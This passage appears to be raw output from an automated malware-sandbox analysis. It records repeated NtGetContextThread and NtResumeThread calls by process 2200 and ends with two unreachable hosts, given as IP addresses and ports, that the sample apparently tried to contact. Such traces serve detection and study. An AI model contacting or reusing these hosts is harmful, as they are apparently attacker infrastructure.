process_identifier: 2200
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtResumeThread

thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2200
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtResumeThread

thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x0000031c
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000354
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000410
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x000002c0
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000264
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000344
suspend_count: 1
process_identifier: 2200
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtGetContextThread

thread_handle: 0x00000100
1 0 0

NtResumeThread

thread_handle: 0x00000100
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x000003e8
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x0000041c
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000288
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x000003bc
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000348
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x0000034c
suspend_count: 1
process_identifier: 2200
1 0 0

NtResumeThread

thread_handle: 0x00000448
suspend_count: 1
process_identifier: 2200
1 0 0
dead_host 85.209.176.171:80
dead_host 149.40.62.171:15666